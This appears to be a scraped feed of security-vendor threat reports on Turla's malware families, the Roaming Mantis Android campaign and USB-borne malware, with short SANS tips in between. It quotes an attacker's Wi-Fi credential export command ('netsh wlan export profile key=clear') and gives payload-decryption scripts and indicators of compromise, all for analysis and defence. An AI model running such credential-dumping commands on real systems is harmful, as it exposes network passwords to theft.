Turla, also known as Venomous Bear, Waterbug, and Uroboros, may be best known for what was at the time an “ultra complex” snake rootkit focused on NATO-related targets, but their malware set and activity is much broader. Our current focus is on more recent and upcoming activity from this APT, which brings an interesting mix of old code, new code, and new speculations as to where they will strike next and what they will shed.

Much of our 2018 research focused on Turla’s KopiLuwak javascript backdoor, new variants of the Carbon framework and meterpreter delivery techniques. Also interesting was Mosquito’s changing delivery techniques, customized PoshSec-Mod open-source powershell use, and borrowed injector code. We tied some of this activity together with infrastructure and data points from WhiteBear and Mosquito infrastructure and activity in 2017 and 2018.

For a first, our KopiLuwak research identified targets and delivery techniques, bringing more accuracy and reliability to the discussion. Also interesting is a review of Turla scripting artefacts leading to newer efforts like KopiLuwak, tracing from older scripting in development efforts in WhiteAtlas and WhiteBear. And, we find 2018 KopiLuwak delivery techniques that unexpectedly matched Zebrocy spearphishing techniques for a first time as well.

Also highly interesting and unusual was the MiTM techniques delivering Mosquito backdoors. In all likelihood, Turla delivered a physical presence of some sort within Wifi range of targets. Download sessions with Adobe’s website were intercepted and injected to deliver Mosquito trojanized installers. This sort of hypothesis is supported by Mosquito installers’ consistent wifi credential theft. Meanwhile, injection and delivery techniques are undergoing changes in 2018 with reflective loaders and code enhancements. We expect to see more Mosquito activity into 2019.

And finally, we discuss the Carbon framework, tying together the older, elegant, and functional codebase sometimes called “Snake lite” with ongoing efforts to selectively monitor high value targets. It appears that the backdoor is pushed with meterpreter now. And, as we see code modifications and deployment in 2018, we predict more development work on this matured codebase along with selective deployment to continue into 2019.

Essentially, we are discussing ongoing activity revolving around several malware families:

  • KopiLuwak and IcedCoffeer
  • Carbon
  • Mosquito
  • WhiteBear
Technical Rattle Turla’s Shifting to Scripting KopiLuwak and IcedCoffee, WhiteBear, and WhiteAtlas

Since at least 2015 Turla has leveraged Javascript, powershell, and wsh in a number of ways, including in their malware dropper/installation operations as well as for implementing complete backdoors. The White Atlas framework often utilized a small Javascript script to execute the malware dropper payload after it was decrypted by the VBA macro code, then to delete the dropper afterwards. A much more advanced and highly obfuscated Javascript script was utilized in White Atlas samples that dropped a Firefox extension backdoor developed by Turla, but again the script was responsible for the simple tasks of writing out the extension.json configuration file for the extension and deleting itself for cleanup purposes.


Turla’s first foray into full-fledged Javascript backdoors began with the usage of the IcedCoffee backdoor that we reported on in our private June 2016 “Ice Turla” report (available to customers of Kaspersky APT Intelligence Services), which led later to their more fully functional and complex, recently deployed, KopiLuwak backdoor. IcedCoffee was initially dropped by exploit-laden RTF documents, then later by macro-enabled Office documents. The macro code used to drop IcedCoffee was a slightly modified version of that found in White Atlas, which is consistent with the code sharing present in many Turla tools. A noteworthy change to the macro code was the addition of a simple web beacon that relayed basic information to Turla controlled servers upon execution of the macro, which not only helped profile the victim but also could be used to track the effectiveness of the attack.

IcedCoffee is a fairly basic backdoor which uses WMI to collect a variety of system and user information from the system, which is then encoded with base64, encrypted with RC4 and submitted via HTTP POST to the C2 server. IcedCoffee has no built-in command capability, instead it may receive javascript files from the C2 server, which are deobfuscated and executed in memory, leaving nothing behind on disk for forensic analysis. IcedCoffee was not widely deployed, rather it was targeted at diplomats, including Ambassadors, of European governments.


In November 2016, Kaspersky Lab observed a new round of weaponized macro documents that dropped a new, heavily obfuscated Javascript payload that we named KopiLuwak (one of the rarest and most expensive types of coffee in the world). The targeting for this new malware was consistent with earlier Turla operations, focusing on European governments, but it was even more selectively deployed than IcedCoffee.

The KopiLuwak script is decoded by macro code very similar to that previously seen with IcedCoffee, but the resulting script is not the final step. This script is executed with a parameter used as a key to RC4 decrypt an additional layer of javascript that contains the system information collection and command and control beaconing functionality. KopiLuwak performs a more comprehensive system and network reconnaissance collection, and like IcedCoffee leaves very little on disk for investigators to discover other than the base script.

Unlike IcedCoffee, KopiLuwak contains a basic set of command functionality, including the ability to run arbitrary system commands and uninstall itself. In mid-2017 a new version was discovered in which this command set had been further enhanced to include file download and data exfiltration capabilities.

The most recent evolution in the KopiLuwak life cycle was observed in mid-2018 when we observed a very small set of systems in Syria and Afghanistan being targeted with a new delivery vector. In this campaign the KopiLuwak backdoor was encoded and delivered in a
Windows shortcut (.lnk) file. The lnk files were an especially interesting development because the powershell code they contain for decoding and dropping the payload is nearly identical to that utilized by the Zebrocy threat actor a month earlier.

Carbon – the long tail

Carbon continues to be deployed against government and foreign affairs related organizations in Central Asia. Carbon targeting in this region has shifted across a few countries since 2014. Here, we find a new orchestrator v3.8.2 and a new injected transport library v4.0.8 deployed to multiple systems. And while we cannot identify a concrete delivery event for the dropper, its appearance coincides with the presence of meterpreter. This meterpreter reliance also coincides with wider Turla use of open source tools that we documented towards the end of 2017 and beginning of 2018.

The Epic Turla operation reported in 2014 involved highly selective Carbon delivery and was a long term global operation that affected hundreds of victims. Only a small portion of these systems were upgraded to a malware set known as “the Carbon framework”, and even fewer received the Snake rootkit for “extreme persistence”. So, Carbon is known to be a sophisticated codebase with a long history and very selective delivery, and coincides with Snake rootkit development and deployment. In light of its age, it’s interesting that this codebase is currently being modified, with additional variants deployed to targets in 2018.

We expect Carbon framework code modifications and predict selective deployment of this matured codebase to continue into 2019 within Central Asia and related remote locations. A complex module like this one must require some effort and investment, and while corresponding loader/injector and lateral movement malware moves to open source, this backdoor package and its infrastructure is likely not going to be replaced altogether in the short term.

.JS attachments deliver Skipper/WhiteAtlas and WhiteBear

We introduced WhiteBear actionable data to our private customers early 2017, and similar analysis to that report was publicly shared eight months later. Again, it was a cluster of activity that continued to grow past expectations. It is interesting because WhiteBear shared known compromised infrastructure with KopiLuwak: soligro[.]com. WhiteBear scripted spearphish attachments also follows up on initial WhiteAtlas scripting development and deployment efforts.

Mosquito’s Changing 2018 Delivery Techniques

In March 2018, our private report customers received actionable data on Mosquito’s inclusion of fileless and customized Posh-SecMod metasploit components. When discussion of the group’s metasploit use was made public, their tactics began to change.

The “DllForUserFileLessInstaller” injector module maintained a compilation date of November 22, 2017, and was starting to be used by Mosquito to inject ComRAT modules into memory around January 2018. It is a small piece of metasploit injector code that accounts for issues with Wow64. Also, related open source powershell registry loader code oddly was modified to avoid AES use, and opt for 3DES encryption instead. Here is the modified Mosquito code:

And here is the default Posh-SecMod code that they ripped from:

We expect to see more open-source based or inspired fileless components and memory loaders from Mosquito throughout 2018. Perhaps this malware enhancement indicates that they are more interested in maintaining current access to victim organizations than developing offensive technologies.

MiTM and Ducking the Mosquito Net

We delivered actionable data on Mosquito to our private intel customers in early 2017. Our initial findings included data around an unusual and legitimate download URL for trojanized installers:


While we could not identify the MiTM techniques with accuracy at the time, it is possible either WiFi MiTM or router compromise was used in relation to these incidents. It is unlikely, but possible, that ISP-level FinFisher MiTM was used, considering multiple remote locations across the globe were targeted.

But there is more incident data that should be elaborated on. In some cases, two “.js” files were written to disk and the infected system configured to run them at startup. Their naming provides insight into the intention of this functionality, which is to keep the malware remotely updated via google application, and maintain local settings updates by loading and running “1.txt” at every startup. In a way, this staged script loading technique seems to be shared with the IcedCoffee javascript loading techniques observed in past Turla incidents focused on European government organizations. Updates are provided from the server-side, leading to fewer malware set findings.

  • google_update_checker.js
  • local_update_checker.js

So, we should consider the wifi data collection that Mosquito Turla performed during these updates, as it hasn’t been documented publicly. One of the first steps that several Mosquito installer packages performed after writing and running this local_update js file was to export all local host’s WiFi profiles (settings and passwords) to %APPDATA%\<profile>.xml with a command line call:

cmd.exe /c netsh wlan export profile key=clear folder="%APPDATA%"

They then gather more network information with a call to ipconfig and arp -a. Maintaining ongoing host-based collection of wifi credentials for target networks makes it far easier to possess ongoing access to wifi networks for spoofing and MiTM, as brute-forcing or otherwise cracking weakly secured WiFi networks becomes unnecessary. Perhaps this particular method of location-dependent intrusion and access is on the decline for Mosquito Turla, as we haven’t identified new URLs delivering trojanized code.

The Next Strike

It’s very interesting to see ongoing targeting overlap, or the lack of overlap, with other APT activity. Noting that Turla was absent from the milestone DNC hack event where Sofacy and CozyDuke were both present, but Turla was quietly active around the globe on other projects, provides some insight as to ongoing motivations and ambitions of this group. It is interesting that data related to these organizations has not been weaponized and found online while this Turla activity quietly carries on.

Both Turla’s Mosquito and Carbon projects focus mainly on diplomatic and foreign affairs targets. While WhiteAtlas and WhiteBear activity stretched across the globe to include foreign affairs related organizations, not all targeting consistently followed this profile. Scientific and technical centers were also targeted, and organizations outside of the political arena came under focus as well. Turla’s KopiLuwak activity does not necessarily focus on diplomatic/foreign affairs, and also winds down a different path. Instead, 2018 activity targeted government related scientific and energy research organizations, and a government related communications organization in Afghanistan. This highly selective but wider targeting set most likely will continue into 2019.
From the targeting perspective, we see closer ties between the KopiLuwak and WhiteBear activity, and closer alignments between Mosquito and Carbon activity.

And WhiteBear and KopiLuwak shared infrastructure while deploying unusual .js scripting. Perhaps open source offensive malware will become much more present in Mosquito and Carbon attacks as we see more meterpreter and injector code, and more uniquely innovative complex malware will continue to be distributed with KopiLuwak and a possible return of WhiteBear. And as we see with borrowed techniques from the previous zebrocy spearphishing, techniques are sometimes passed around and duplicated.

CEO Fraud

SANS Tip of the Day - Thu, 10/04/2018 - 01:00
CEO Fraud / BEC is a type of targeted attack. It commonly involves a cyber criminally pretending to be your boss, then tricking or fooling you into sending the criminal highly sensitive information or initiating a wire transfer. Be highly suspicious of any emails demanding immediate action and/or asking you to bypass any security procedures.

Roaming Mantis part III: iOS crypto-mining and spreading via malicious content delivery system

Malware Alerts - Mon, 10/01/2018 - 06:00

In Q2 2018, Kaspersky Lab published two blogposts about Roaming Mantis sharing details of this new cybercriminal campaign. In the beginning, the criminals used DNS hijacking in vulnerable routers to spread malicious Android applications of Roaming Mantis (aka MoqHao and XLoader), spoofing legitimate applications such as Facebook and Chrome. During our research, it became clear that Roaming Mantis has been rather active and has evolved quickly. The group’s malware now supports 27 languages, including multiple countries from Asia and beyond, Europe and the Middle East. In addition, they have started using web crypto-mining for PC, and an Apple phishing page for iOS devices.

You can check previous chapters of this research here:

In addition we would like to thank and credit security researchers from LAC Co. Ltd. for a very insightful article describing how vulnerable routers were compromised by the Roaming Mantis group, which was disclosed in their Japanese blogpost in June 2018. According to this research, the threat actor logged in to their router using default ID and password, and changed legitimate DNS settings to rogue DNS settings, where the router’s control panel was accessible over the Internet.

The Roaming Mantis group did not stop its activities after publication or our reports. We have confirmed several new activities and changes to their illegal profit-gaining methods such as web crypto mining for iOS devices, spreading via malicious content delivery system and so on. This blogpost reveals some details of our new findings related to Roaming Mantis, based on our research.

Web crypto-mining for iOS devices

The criminals previously targeted iOS devices using an Apple phishing site to steal credentials. However, they changed the HTML source code of the malicious landing page as follows:

Part of HTML source code of the malicious landing page for iOS

The code above shows that they disabled redirection to the fake Apple portal (with a phishing page) and added code with a web mining script (previously used only for the PC platform) to run mining on iOS devices.

If the user visits this landing page from an iOS device, a blank page displays in the web browser. In the background, CPU usage increases to 90% immediately.

Screen capture of the landing page and CPU monitoring tool

Interestingly, the day after we confirmed this, the attacker switched back to Apple phishing again. We believe that the criminals, at that time, were testing the possible revenue from web mining on iOS devices, looking for an efficient way to monetize their activities.

Filtering Japanese devices

One thing we noticed is that the criminals responded to a number of articles and research activities coming from Japan. The new feature was added in the landing page to filter out Japanese environment:

Added confirmation of Japanese environment for filtering

It looks like they want to slow down infections of Japanese targets for the time being.

Spreading via another malware delivery system

In the middle of July 2018, the live landing page we had been monitoring unfortunately went dark. However, the malicious APK files of Roaming Mantis, detected as “”, were still being detected by our customers, according to our KSN data.

Number of detected users from KSN data (Jun 10, 2018 – Sep 10, 2018)

Our deeper investigation revealed that their new malware spreading method was the one used by other Android malware, the “sagawa.apk” delivery system. We published a Japanese blogpost of this Android malware in January 2018. Trend Micro named it FAKESPY and published a blogpost about it, “FakeSpy Android Information-Stealing Malware Targets Japanese and Korean-Speaking Users”. According to our previous blogpost, the infection vector involved users received a phishing SMS message spoofing a notification from a Japanese delivery company. The message contained a malicious URL. If the user clicked it, the server displayed a fake web site that downloaded and installed the malicious application “sagawa.apk”. We discovered two types of such “sagawa.apk” samples:

Type A Type B File name sagawa.apk sagawa.apk md5 956f32a28d0057805c7234d6a13aa99b a19f4cb93274c949e66efe13173c95e6 File size 427KB (437,556) 2.3MB (2,381,665) Loader module \classes.dex \classes.dex +
\lib\x86_64\ Encrypted payload (enc_data) \assets\a \assets\ Decrypt algorithm payload = base64_dec(zlib_dec(enc_data)); aes_key = base64_dec(hardcoded data);
payload = AES_dec(enc_data, aes_key); Alias MaqHao (McAfee)
XLoader (TrendMicro) FAKESPY (TrendMicro) Old file name facebook.apk
${random}.apk sagawa.apk

Based on detailed static analysis, they belong to different Android malware families. Both Type A and Type B have common features, such as monitoring SMS messages and stealing data from infected devices. However, there are differences in their code structure, communication protocol and other features. One significant difference is that Type B targets Japan only, unlike Type A which is multilingual. Type B contains hardcoded strings that are displayed to infected users. These strings are in Japanese only.

Japanese messages displayed to infected users

In addition, this malware confirms whether a domestic Japanese prepaid card application is installed on the infected device.

Check for the domestic Japanese prepaid card application “Au Wallet”

If the application is installed on the device, the malware downloads and installs a fake application as its update.

Unfortunately, the relationship between the Roaming Mantis group and the service owner of the “sagawa.apk” delivery mechanism isn’t very clear at the moment. They might just use the same service as customers, or might not. However, it is clear that these criminal groups use the same malware-spreading eco-system for spreading their Android malware.

Researchers may use the following simplified python scripts to extract the payload from “sagawa.apk”:

#!/usr/bin/env python import sys import zlib import base64 data = open(sys.argv[1],"rb").read() dec_z = zlib.decompress(data) dec_b = base64.b64decode(dec_z) with open(sys.argv[1]+".dec","wb") as fp: fp.write(dec_b)

#!/usr/bin/env python import sys from Crypto.Cipher import AES, ARC4 import base64 data = open(sys.argv[1],"rb").read() key = sys.argv[2] aes_key = base64.b64decode(key) // key is H8chGVmHxKRdjVSO14Mvgg== in aes = dec = aes.decrypt(data) with open(sys.argv[1]+".dec","wb") as fp: fp.write(dec)

Spreading via like a scam

We also observed another malware distribution method of Roaming Mantis which is linked to Prezi is a popular computer application and online service to create dynamic presentations. The criminals used this service to spread their scam. When a user visits a page crafted by the attackers, a link is shown offering free content such as adult video, a game, a comic, music and so on, like pirate editions.

Redirection to a scam page

Based on our research, there were multiple messages leveraging different social engineering tricks to invite users to a scam website. On the other hand, the Roaming Mantis’ landing page was found to be linked to several such accounts carrying out redirections.

Corrupted landing page code from Roaming Mantis posted on

However, fortunately this code does not work because of mistakes made during the code preparation stage.

Records of stolen data

Kaspersky Lab discovered fragments of data stolen from victims’ Android devices via Type A of the malware, which suggests thousands of compromised victims:

Suspected stolen data from victims’ Android devices

This data contained phone number, date, IP, language, email/id, password, name, date of birth, address, credit card information including cvv, bank information, and secret question and answer in Simplified Chinese. Data headers in Chinese suggest that the attackers are fluent in Chinese – unless this is a false flag, of course. The first column seems to contain the record number, which in July was already over 4,800. The user device language setting may indicate victims’ geography. Below is a pie chart created from the language data:

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","");

Victims’ language settings (download)

The top language is “en-us” (39%), the second is “ko-kr”, the third is “ru”. Judging from this data, victims’ geographical distribution has changed significantly since our first report. This might be due to the update adding support for 27 languages and the new distribution strategies. The reason why the “en-us” is the most popular could be because English is used as second language in several countries.


In previous reports, we claimed that the Roaming Mantis campaign had evolved significantly in a short period of time, applying new attack methods and expanding its targets. It seems that the attack doesn’t stop developing. In our recent research, we found that they probed using a web miner for iOS, instead of redirecting to a fake Apple website.

Another new method they applied is the use of a malware delivery eco-system that is probably operated by a third party and was used to spread other (maybe even unrelated) malware in the past. The infection vector in that case was an SMS message with a malicious link that led a user to a fake web site that offered a download of the malicious apk file “sagawa.apk”. It is not clear how Roaming Mantis and the distributor of “sagawa.apk” are related, but it’s worth mentioning the fact that they are now using the same eco-system.

Roaming Mantis is also trying to spread its malware via, with a scam that offers a visitor free content such as videos and more.

Judging from the list of stolen credentials, the attackers seems to have stolen a large amount of data from victims worldwide. This gives us a glimpse of the real scale of the attack, but we believe that this is just a tip of the iceberg.

We strongly recommend that Android users turn off the option that allows installation of applications from third-party repositories, to keep their device safe. They should also be suspicious if their phones become unusually hot, which may be a side-effect of the hidden crypto-mining application in action.

Kaspersky Lab products detect this malware with the following verdict:

  • HEUR:Trojan-Banker.AndroidOS.Wroba
IoCs Malicious hosts:
  • 59.105.6[.]230
  • sagawa-otqwt[.]com
  • sagawa-polsw[.]com
Hashes of Type A:
  • 956f32a28d0057805c7234d6a13aa99b sagawa.apk
  • 3562f9de6dbe70c2e19a20d8683330ce \classes.dex
  • 01fa0039b62c5db8d91dfc6b75b246f8 decrypted payload (dex file) from \assets\a
Hashes of Type B:
  • a19f4cb93274c949e66efe13173c95e6
  • 5e913208ecc69427efb6bbf9e6505624 \classes.dex
  • 67bc2e8beb14b259a5c60fe7a31e6795 \arm64-v8a/
  • f120f5f78c7ef762996314cf10f343af \armeabi-v7a/
  • efe54c22e2b28a44f723d3479487620c \x86_64/
  • e723c6aec4433f3c6e5d3d24fe810e05 \x86/
  • daeccda295de93cf767fd39a86a44355 decrypted payload (jar file) from \assets\
  • 581b08b277a8504ed222a71c19cea5f9 classes.dex from decrypted payload


SANS Tip of the Day - Thu, 09/27/2018 - 01:00
Ransomware is a special type of malware. Once it infected your computer, it encrypts all of your files and demands you pay a ransome if you want your files back. Be suspicious of any emails trying to trick you into opening infected attachments or click on malicious links, common sense is your best defense. In addition. backups are often the only way you can recover from ransomware.

USB threats from malware to miners

Malware Alerts - Tue, 09/25/2018 - 06:00


In 2016, researchers from the University of Illinois left 297 unlabelled USB flash drives around the university campus to see what would happen. 98% of the dropped drives were picked up by staff and students, and at least half were plugged into a computer in order to view the content. For a hacker trying to infect a computer network, those are pretty irresistible odds.

USB devices have been around for almost 20 years, offering an easy and convenient way to store and transfer digital files between computers that are not directly connected to each other or to the internet. This capability has been exploited by cyberthreat actors, most famously by the Stuxnet worm in 2010, which used USB devices to inject malware into the network of an Iranian nuclear facility.

Today, cloud services such as Dropbox have taken on much of the heavy lifting in terms of file storage and transfer, and there is greater awareness of the security risks associated with USB devices. Their use as an essential business tool is declining. Despite this, millions of USB devices are still produced and distributed annually, with many destined for use in homes, businesses and marketing promotion campaigns like trade show giveaways.

USB devices remain a target for cyberthreats. Kaspersky Lab data for 2017 shows that every 12 months or so, around one in four users worldwide is affected by a ‘local’ cyber incident. These are attacks detected directly on a user’s computer and include infections caused by removable media like USB devices.

This short report reviews the current cyberthreat landscape for removable media, particularly USBs, and provides advice and recommendations on protecting these little devices and the data they carry.

Methodology and key findings

The overview is based on detections by Kaspersky Lab’s file protection technologies in the drive root of user computers, with a specific scan filter and other measures applied. It covers malware-class attacks only and does not include detections of potentially dangerous or unwanted programs such as adware or risk tools (programs that are not inherently malicious, but are used to hide files or terminate applications, etc. that could be used with malicious intent). The detection data is shared voluntarily by users via Kaspersky Security Network (KSN).

Key findings
  • USB devices and other removable media are being used to spread cryptocurrency mining software – and have been since at least 2015. Some victims were found to have been carrying the infection for years.
  • The rate of detection for the most popular bitcoin miner, Trojan.Win64.Miner.all, is growing by around one-sixth year-on-year.
  • One in 10 of all users hit by removable media infections in 2018 was targeted with this crypto-miner (around 9.22%, up from 6.7% in 2017 and 4.2% in 2016).
  • Other malware spread through removable media/USBs includes the Windows LNK family of Trojans, which has been among the top three USB threats detected since at least 2016.
  • The 2010 Stuxnet exploit, CVE-2010-2568, remains one of the top 10 malicious exploits spread via removable media.
  • Emerging markets are the most vulnerable to malicious infection spread by removable media – with Asia, Africa and South America among the most affected – but isolated hits were also detected in countries in Europe and North America.
  • Dark Tequila, a complex banking malware reported on August 21, 2018 has been claiming consumer and corporate victims in Mexico since at least 2013, with the infection spreading mainly through USB devices.
The evolving cyberthreat landscape for USBs

Infections caused by removable media are defined as local threats – those that are detected directly on a user’s computer, for example, during a scheduled, installation or user-initiated security scan. Local threats differ from threats targeting computers over the internet (web-borne threats), which are far more prevalent. Local infections can also be caused by an encrypted malicious program hidden in a complex installer. To isolate the data for malware spread by removable media such as USB devices, we took the detections triggered in the drive root of affected computers – a strong indicator that the infection source is removable media.

This data shows that the number of removable media (drive root) threat detections has declined steadily since 2014, but the overall rate of decline may be slowing down. In 2014, the ratio between a user affected by a removable media threat and the total number of such threats detected was 1:42; by 2017 this had dropped by around half to 1:25; with the estimate for 2018 around 1:22.

These numbers pale in comparison to web-borne threats: in 2017, Kaspersky Lab’s file antivirus detected 113.8 million likely removable media threats, while its web antivirus repelled just under 1.2 billion attacks launched from online resources. In light of this, it can be easy to overlook the enduring risks presented by removable media, even though around four million users worldwide will be infected in this way in 2018.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","");

*Total number (in millions) of malware detections triggered in the drive root of user computers, a strong indicator of infection by removable media, 2013 – 2018. Source: KSN (download)

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","");

*Number of unique users (in millions) with malware detections triggered in the drive root of computers, a strong indicator of infection by removable media, 2013 – 2018. Source: KSN (download)

USBs as a tool for advanced threat actors

USB devices appeal to attackers targeting computer networks that are not connected to the internet – such as those powering critical national infrastructure. The most famous example of this is probably the Stuxnet campaign. In 2009 and 2010, the Stuxnet worm targeted Iran’s nuclear facilities in order to disrupt operations.

USB devices were used to inject malware into the facilities’ air-gapped networks. Among other things, the devices included an exploit to a Windows LNK vulnerability (CVE-2010-2568) that enabled remote code execution. Other advanced threat actors, including Equation Group, Flame, Regin and HackingTeam, have all integrated exploits for this vulnerability into removable media to use in attacks.

Further, the structure of most USB devices allows them to be converted to provide hidden storage compartments, for the removal of stolen data, for example. The ProjectSauron 2016 toolkit was found to include a special module designed to move data from air-gapped networks to internet-connected systems. This involved USB drives that had been formatted to change the size of the partition on the USB disk, reserving some hidden space (several hundred megabytes) at the end of the disk for malicious purposes.

The Stuxnet survivor CVE-2010-2568

Microsoft fixed the last of the vulnerable LNK code path in March 2015. However, in 2016, as many as one in four Kaspersky Lab users who encountered an exploit through any attack medium, including web-borne threats, faced an exploit for this vulnerability, (although it was overtaken in 2017 by the EternalBlue exploit). However, CVE-2010-2568 continues to feature in malware distributed by USB devices and other removable media: where, despite rapidly falling numbers of detections and victims, it still ranks among the top 10 drive root threats detected by KSN.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","");

Total drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 – 2018. Source: KSN (download)

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","");

Users with drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 – 2018. Source: KSN (download)

If the exploit detections provide an indication of the volume of malware being transmitted via removable media such as USBs, the following illustrate the kind of malware being distributed in this way.

Malware delivered via removable media

The top malware spread via removable media has stayed relatively consistent since at least 2016. For example, the family of Windows LNK malware, Trojans containing links for downloading malicious files or paths for launching a malicious executable, has remained among the top three threats spread by removable media. This malware is used by attackers to destroy, block, modify or copy data, or to disrupt the operation of a device or its network. The WinLNK Runner Trojan, which was the top detected USB threat in 2017, is used in worms for launching executable files.

In 2017, 22.7 million attempted WinLNK.Agent infections were detected, affecting nearly 900,000 users. The estimate for 2018 is around 23 million attacks, hitting just over 700,000 users. This represents a 2% rise in detections and a 20% drop in the number of users targeted year-on-year.

For the WinLNK Runner Trojan the numbers are expected to fall more sharply – with a 61% drop in detections from 2.75 million in 2017 to an estimated 1 million in 2018; and a decline of 51% in the number of users targeted (from around 920,000 in 2017 to just over 450,000 in 2018).

Other top malware spread through USB devices includes the Sality virus, first detected in 2003 but heavily modified since; and the Dinihou worm that automatically copies itself onto a USB drive, creating malicious shortcuts (LNKs) that launch the worm as soon as the new victim opens them.

Miners – rare but persistent

USB devices are also being used to spread cryptocurrency mining software. This is relatively uncommon, but successful enough for attackers to continue using this method of distribution. According to KSN data, a popular crypto-miner detected in drive roots is Trojan.Win32.Miner.ays/Trojan.Win64.Miner.all, known since 2014.

Malware in this family secretly uses the processor capacity of the infected computer to generate the cryptocurrency. The Trojan drops the mining application onto the PC, then installs and silently launches the mining software and downloads the parameters that enable it to send the results to an external server controlled by the attacker.

Kaspersky Lab’s data shows that some of the infections detected in 2018 date back years, indicating a lengthy infection likely to have had a significant negative impact on the processing power of the victim device.

Detection data for the 32-bit version of Trojan.Win32.Miner.ays is as follows:

Year Detection data for Trojan.Win32.Miner.ays Unique user count 2017 778,620 236,000 2018 (estimate based on H1) 600,698 196,866

Between H1 2017 (136,954 unique users) and H1 2018 (93,433 unique users), there was a fall of 28.13 percentage points in the number of people affected by the 32-bit version of the miner.

The other version, Trojan.Win64.Miner.all, saw an expected surge in the first year of detection, after which the number of users hit has levelled out to a steady growth rate of around one-sixth per year. This small but steady growth rate can also been seen when the number of users targeted with this mining malware is compared against the overall number of users hit by removable media threats. This shows that around one in 10 users hit with a removable media threat in 2018 will be targeted with this miner, about a two-fold rise in two years.

These results suggest that propagation via removable media works well for this threat.

Detection data for Trojan.Win64.Miner.all is as follows:

Year Detection data for
Trojan.Win64.Miner.all Unique user count YoY change Unique user count as share of all users hit with a removable media threat 2016 4,211,246 245,702 +70.15% 4.2% 2017 4,214,785 301,178 +18.42% 6.7% 2018 (estimate based on H1) 4,209,958 362,242 +16.42% 9.2% Dark Tequila – advanced banking malware

In August 2018, Kaspersky Lab researchers reported on a sophisticated cyber operation code-named Dark Tequila that has been targeting users in Mexico for at least the last five years, stealing bank credentials and personal and corporate data with malware that can move laterally through the victim computer while offline.

According to Kaspersky Lab researchers, the malicious code spreads through infected USB devices and spear phishing and includes features to evade detection. The threat actor behind Dark Tequila is believed to be Spanish-speaking and Latin American in origin.

Target geography

Emerging markets appear to be the most vulnerable to infection by removable media.

The annual numbers for 2017 show that in many such countries, around two-thirds of users experienced a ‘local’ incident, which includes drive root malware infections from removable media, compared to less than one in four in developed economies. These figures appear to be remaining consistent into 2018.

For the LNK exploit spread through removable media, the most affected countries in 2018 to date are Vietnam (18.8% of users affected), Algeria (11.2%) and India (10.9%), with infections also found in the rest of Asia, Russia and Brazil, among others, and a few hits in a number of European countries (Spain, Germany, France, the UK and Italy), the U.S. and Japan.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","");

Share of users affected by an exploit for CVE-2010-2568 through removable media, 2018. Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included) (download)

The reach is broader for the miner. Trojan.Win32.Miner.ays/Trojan.Win.64.Miner.all detections are mainly found in India (23.7%), Russia (18.45% – likely to be impacted by a larger customer base) and Kazakhstan (14.38%), with infections also found in other parts of Asia and Africa, and a few hits in several European countries (the UK, Germany, the Netherlands, Switzerland, Spain, Belgium, Austria, Italy, Denmark and Sweden), the U.S., Canada and Japan.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","");

Share of users affected by the bitcoin cryptocurrency miner through removable media, 2018. Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included) (download)

Conclusion and advice

The main purpose of this short paper is to raise awareness of a threat that consumers and businesses may underestimate.

USB drives offer many advantages: they are compact and handy, and a great brand asset, but the devices themselves, the data stored on them and the computers they are plugged into are all potentially vulnerable to cyberthreats if left unprotected.

Fortunately, there are some effective steps consumers and organizations can take to secure the use of USB devices.

Advice for all USB users:

  • Be careful about the devices you connect to your computer – do you know where it came from?
  • Invest in encrypted USB devices from trusted brands – this way you know your data is safe even if you lose the device
  • Make sure all data stored on the USB is also encrypted
  • Have a security solution in place that checks all removable media for malware before they are connected to the network – even trusted brands can be compromised through their supply chain

Additional advice for businesses:

  • Manage the use of USB devices: define which USB devices can be used, by whom and for what
  • Educate employees on safe USB practices – particularly if they are moving the device between a home computer and a work device
  • Don’t leave USBs lying around or on display

Kaspersky Lab’s security solutions, such as Kaspersky Endpoint Security for Windows, provide security and encryption for all removable media including USB devices.

Secure Your Home Wi-Fi Network

